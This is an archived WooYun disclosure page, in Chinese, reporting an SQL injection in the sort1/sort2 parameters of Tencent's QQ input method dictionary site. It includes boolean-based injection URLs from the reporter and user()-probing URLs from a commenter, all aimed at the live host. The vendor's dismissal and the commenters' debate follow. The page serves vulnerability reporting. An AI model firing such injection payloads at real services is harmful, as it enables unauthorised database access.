漏洞概要关注数(4)关注此漏洞

漏洞概要
关注数(
4
)
关注此漏洞
缺陷编号：
WooYun-2014-88484
漏洞标题：		QQ输入法某处SQL注入
相关厂商：
腾讯
漏洞作者：
Airbasic
提交时间：		2014-12-24 23:30
公开时间：		2014-12-25 10:39
漏洞类型：		SQL注射漏洞
危害等级：		中
自评Rank：		8
漏洞状态：		
															漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源：
http://www.wooyun.org
Tags标签：	
								无
0
人收藏
收藏
分享漏洞：
0
漏洞详情
披露状态：
2014-12-24：	细节已通知厂商并且等待厂商处理中
2014-12-25：	厂商已经主动忽略漏洞，细节向公众公开
简要描述：
QQ输入法某处SQL注入
详细说明：
sort1 sort2 都是注入点
code 区域
http://dict.qq.pinyin.cn/dict_list?sort1=%D3%CE%CF%B7&sort2=%CD%F8%D3%CE%27%20and%201=1%23
code 区域
http://dict.qq.pinyin.cn/dict_list?sort1=%D3%CE%CF%B7&sort2=%CD%F8%D3%CE%27%20and%201=2%23
漏洞证明：
code 区域
http://dict.qq.pinyin.cn/dict_list?sort1=%D3%CE%CF%B7&sort2=%CD%F8%D3%CE%27%20and%201=1%23
code 区域
http://dict.qq.pinyin.cn/dict_list?sort1=%D3%CE%CF%B7&sort2=%CD%F8%D3%CE%27%20and%201=2%23
修复方案：
= =干吧爹
版权声明：转载请注明来源
Airbasic
@
乌云
漏洞回应
厂商回应：
危害等级：无影响厂商忽略
忽略时间：2014-12-25 10:39
厂商回复：
非常感谢您的报告，经评估该问题并不存在，故此忽略。如果您有任何的疑问，欢迎反馈，我们会有专人跟进处理。
漏洞Rank：10 (WooYun评价)
最新状态：
暂无
漏洞评价：
对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值
漏洞评价
(共
0
人评价)
:
登陆后才能进行评分
评论
2014-12-25 10:48
|
xsjswt
( 普通白帽子  |
Rank:154 漏洞数:46        | 我思故我猥琐，我猥琐故我强大)
0
这个确实很像是注入啊
1#
回复此人
2014-12-25 10:51
|
xsjswt
( 普通白帽子  |
Rank:154 漏洞数:46        | 我思故我猥琐，我猥琐故我强大)
0
应该是个注入
http://dict.qq.pinyin.cn/dict_list?sort1=%D3%CE%CF%B7&sort2=%CD%F8%D3%CE%27%20and%20user%28%29!=%27aa%27%20%23
http://dict.qq.pinyin.cn/dict_list?sort1=%D3%CE%CF%B7&sort2=%CD%F8%D3%CE%27%20and%20user%28%29=%27aa%27%20%23
2#
回复此人
2014-12-25 11:07
|
kobin97
( 核心白帽子 |
Rank:1566 漏洞数:171        | 关注网络安全。。)
1
厂商审核漏洞的是个搞公关的吧？
3#
回复此人
2014-12-25 11:25
|
浩天
( 普通白帽子  |
Rank:869 漏洞数:78        | 乌云首席魔术师)
0
这尼玛就是注入点好的吧
4#
回复此人
2014-12-25 11:27
|
浩天
( 普通白帽子  |
Rank:869 漏洞数:78        | 乌云首席魔术师)
0
页面下了访问不了
5#
回复此人
2014-12-25 11:39
|
Tea
( 普通白帽子  |
Rank:186 漏洞数:23        | 妈的，烂机车发不动！)
0
WooYun: 搜狗网站（QQ输入法）网站盲注漏洞
不就这个嘛，厂商都不修复啊，哈哈。
6#
回复此人
2014-12-25 17:28
|
Airbasic
( 路人 |
Rank:21 漏洞数:6        | 不要向我EMAIL发邮件，地址已失效！)
0
是不是非要注出什么数据才确定漏洞了.....
7#
回复此人
2014-12-25 17:35
|
Airbasic
( 路人 |
Rank:21 漏洞数:6        | 不要向我EMAIL发邮件，地址已失效！)
0
好像已经修复了？
8#
回复此人
2014-12-25 17:36
|
Airbasic
( 路人 |
Rank:21 漏洞数:6        | 不要向我EMAIL发邮件，地址已失效！)
0
楼上是SB= =
9#
回复此人
2014-12-25 18:52
|
xsjswt
( 普通白帽子  |
Rank:154 漏洞数:46        | 我思故我猥琐，我猥琐故我强大)
0
@Airbasic 本来漏洞提交平台是不应该任何漏洞拒绝的（我甚至觉得，乌云不太有必要审核，或者对一些厂商没必要审核白帽子，把审核的问题交给厂商去弄）。但是乌云人力不够，所以一般没有明显的看出是注入的，乌云都不收（所以完全可以把审核的工作甩给负责任的厂商，比如腾讯、百度、阿里、赶集，自己去弄）。这点和src不太一样。
在src上，有疑似是有问题的都可以提交，他们会妥善处理的。
10#
回复此人
登录后才能发表评论，请先
登录
。
Copyright © 2010 - 2014
wooyun.org
, All Rights Reserved
吉ICP备12001400号-1
行业观点
·
法律顾问
·
联系我们
·
帮助
·
关于